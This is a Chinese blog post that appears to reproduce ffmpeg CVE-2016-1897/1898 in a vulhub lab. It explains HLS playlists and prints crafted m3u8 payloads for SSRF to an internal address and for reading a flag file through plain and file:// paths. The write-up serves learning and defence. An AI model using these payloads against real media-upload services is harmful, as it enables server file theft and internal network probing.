<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>ffmpeg 任意文件读取漏洞/SSRF漏洞 - Geekby&#39;s Blog</title><meta name="Description" content="ffmpeg 任意文件读取漏洞/SSRF漏洞"><meta property="og:title" content="ffmpeg 任意文件读取漏洞/SSRF漏洞" />
<meta property="og:description" content="ffmpeg 任意文件读取漏洞/SSRF漏洞" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2019/02/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2019-02-15T09:25:00+08:00" />
<meta property="article:modified_time" content="2019-02-15T09:25:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="ffmpeg 任意文件读取漏洞/SSRF漏洞"/>
<meta name="twitter:description" content="ffmpeg 任意文件读取漏洞/SSRF漏洞"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2019/02/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E/" /><link rel="prev" href="https://www.geekby.site/2019/02/wifi%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/" /><link rel="next" href="https://www.geekby.site/2019/02/flaskjinja2-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "ffmpeg 任意文件读取漏洞/SSRF漏洞",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2019\/02\/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "漏洞复现, vulhub, ffmpeg","wordcount":  79 ,
        "url": "https:\/\/www.geekby.site\/2019\/02\/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E\/","datePublished": "2019-02-15T09:25:00+08:00","dateModified": "2019-02-15T09:25:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "ffmpeg 任意文件读取漏洞/SSRF漏洞"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">ffmpeg 任意文件读取漏洞/SSRF漏洞</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><i class="far fa-folder fa-fw"></i>漏洞复现</a>&nbsp;<a href="/categories/vulhub/"><i class="far fa-folder fa-fw"></i>vulhub</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2019-02-15">2019-02-15</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 79 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 1 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#hlshttp-live-streaming">HLS（HTTP Live Streaming）</a></li>
    <li><a href="#漏洞原理">漏洞原理</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="ffmpeg-任意文件读取漏洞ssrf漏洞-cve-2016-1897cve-2016-1898">ffmpeg 任意文件读取漏洞/SSRF漏洞 （CVE-2016-1897/CVE-2016-1898）</h1>
<p>在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文件处理不当，可导致SSRF漏洞与任意文件读取漏洞。当网站允许用户上传多媒体文件，并使用FFMpeg进行处理时会触发该漏洞。</p>
<p>这个漏洞有两个CVE编号，分别是CVE-2016-1897和CVE-2016-1898，它们两个的区别在于读取文件的行数，CVE-2016-1897只能读取文件的第一行，而CVE-2016-1898可以读取文件任意行，原理基本一样，这里就一起分析了。</p>
<h2 id="hlshttp-live-streaming">HLS（HTTP Live Streaming）</h2>
<p>由于漏洞是出现在解析HLS流媒体文件出的问题，所以我们必须先了解HLS。</p>
<p>HLS（HTTP Live Streaming）是Apple公司开发的一种基于HTTP协议的流媒体通信协议，大多数都应用在PC上和iphone上。它的基本原理是把一个视频流分成很多个很小很小很小的ts流文件，然后通过HTTP下载，每次下载一点点。在一个开始一个新的流媒体会话时，客户端都会先下载一个m3u8（播放列表 Playlist）文件，里面包含了这次HLS会话的所有数据。</p>
<p><code>http://pl.youku.com/playlist/m3u8?vid=340270152&amp;type=3gphd&amp;ts=1462714824&amp;keyframe=0&amp;ep=dSaSGE6MUssC5ybeiz8bYiXiIiZdXP0O9h2CgdNnAtQnS%2Bm2&amp;sid=746271452251312590fab&amp;token=3319&amp;ctype=12&amp;ev=1&amp;oip=3395898128</code></p>
<p>这是youku一个视频的m3u8文件，内容如下：</p>
<blockquote>
<p>#EXTM3U
#EXT-X-TARGETDURATION:6
#EXT-X-VERSION:2
#EXTINF:6,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=0&amp;ts_end=5.9&amp;ts_seg_no=0&amp;ts_keyframe=1
#EXTINF:0,
http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=5.9&amp;ts_end=6.367&amp;ts_seg_no=1&amp;ts_keyframe=1
#EXT-X-ENDLIST</p>
</blockquote>
<p>解析：</p>
<ul>
<li>#EXTM3U 标签是m3u8的文件头，开头必须要这一行</li>
<li>#EXT-X-TARGETDURATION 表示整个媒体的长度 这里是6秒</li>
<li>#EXT-X-VERSION:2 该标签可有可无</li>
<li>#EXTINF:6, 表示该一段TS流文件的长度</li>
<li>#EXT-X-ENDLIST 这个相当于文件结束符</li>
</ul>
<p>这些是m3u8的最基本的标签，而问题就出在FFMpeg去请求TS流文件的时，由于我们可以伪造一个m3u8文件，FFMpeg不会判断里面的流地址，直接请求。</p>
<h2 id="漏洞原理">漏洞原理</h2>
<p>SSRF漏洞：
直接用FFMpeg解析一个多媒体文件</p>
<blockquote>
<p>#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,http://192.168.123.100:8080/1.html
#EXT-X-ENDLIST</p>
</blockquote>
<p>（#EXT-X-MEDIA-SEQUENCE或#EXT-X-TARGETDURATION必须存在任意一个，前者是定义ts流文件的序号。去掉会报错：无效文件）</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print" /></p>
<p><code>ffmpeg -i test.m3u8 test.mp4</code>（也可把m3u8格式改成其他后缀，ffmpeg会自动识别为HLS流文件）</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190611164804.png-water_print" /></p>
<p>以下几个方式可以读取文件:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#EXTM3U
</span></span><span class="line"><span class="cl">#EXT-X-TARGETDURATION:1
</span></span><span class="line"><span class="cl">#EXTINF:1,
</span></span><span class="line"><span class="cl">/home/ctf/flag.txt
</span></span><span class="line"><span class="cl">#EXT-X-ENDLIST
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">#EXTM3U
</span></span><span class="line"><span class="cl">#EXT-X-PLAYLIST-TYPE:VOD
</span></span><span class="line"><span class="cl">#EXT-X-TARGETDURATION:1
</span></span><span class="line"><span class="cl">#EXT-X-VERSION:3
</span></span><span class="line"><span class="cl">#EXT-X-MEDIA-SEQUENCE:0
</span></span><span class="line"><span class="cl">#EXTINF:10.0,
</span></span><span class="line"><span class="cl">file:///home/ctf/flag.txt
</span></span><span class="line"><span class="cl">#EXT-X-ENDLIST
</span></span></code></pre></td></tr></table>
</div>
</div></div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>更新于 2019-02-15</span>
            </div>
            <div class="post-info-license"></div>
        </div>
        <div class="post-info-line">
            <div class="post-info-md"></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="分享到 微博" data-sharer="weibo" data-url="https://www.geekby.site/2019/02/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E/" data-title="ffmpeg 任意文件读取漏洞/SSRF漏洞"><i class="fab fa-weibo fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Evernote" data-sharer="evernote" data-url="https://www.geekby.site/2019/02/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E/" data-title="ffmpeg 任意文件读取漏洞/SSRF漏洞"><i class="fab fa-evernote fa-fw"></i></a><a href="javascript:void(0);" title="分享到 Skype" data-sharer="skype" data-url="https://www.geekby.site/2019/02/ffmpeg-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Essrf%E6%BC%8F%E6%B4%9E/" data-title="ffmpeg 任意文件读取漏洞/SSRF漏洞"><i class="fab fa-skype fa-fw"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"><i class="fas fa-tags fa-fw"></i>&nbsp;<a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>,&nbsp;<a href="/tags/vulhub/">vulhub</a>,&nbsp;<a href="/tags/ffmpeg/">ffmpeg</a></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">返回</a></span>&nbsp;|&nbsp;<span><a href="/">主页</a></span>
        </section>
    </div>

    <div class="post-nav"><a href="/2019/02/wifi%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/" class="prev" rel="prev" title="WIFI 密码破解"><i class="fas fa-angle-left fa-fw"></i>WIFI 密码破解</a>
            <a href="/2019/02/flaskjinja2-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" class="next" rel="next" title="Flask（Jinja2）服务端模板注入漏洞">Flask（Jinja2）服务端模板注入漏洞<i class="fas fa-angle-right fa-fw"></i></a></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line"><i class="far fa-copyright fa-fw"></i><span itemprop="copyrightYear">2019 - 2022</span><span class="author" itemprop="copyrightHolder">&nbsp;<a href="/" target="_blank">Geekby</a></span>&nbsp;|&nbsp;<span class="license"><a rel="license external nofollow noopener noreffer" href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank">CC BY-NC 4.0</a></span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="回到顶部">
                <i class="fas fa-arrow-up fa-fw"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="查看评论">
                <i class="fas fa-comment fa-fw"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/lightgallery/lightgallery.min.css"><script type="text/javascript" src="/lib/smooth-scroll/smooth-scroll.min.js"></script><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/algoliasearch/algoliasearch-lite.umd.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lightgallery.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-thumbnail.min.js"></script><script type="text/javascript" src="/lib/lightgallery/lg-zoom.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"复制到剪贴板","maxShownLines":100},"comment":{},"lightGallery":{"actualSize":false,"exThumbImage":"data-thumbnail","hideBarsDelay":2000,"selector":".lightgallery","speed":400,"thumbContHeight":80,"thumbWidth":80,"thumbnail":true},"search":{"algoliaAppID":"C19A58DMI2","algoliaIndex":"blog","algoliaSearchKey":"a7203b4397475a3fcf49cea4495e0987","highlightTag":"em","maxResultLength":10,"noResultsFound":"没有找到结果","snippetLength":50,"type":"algolia"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
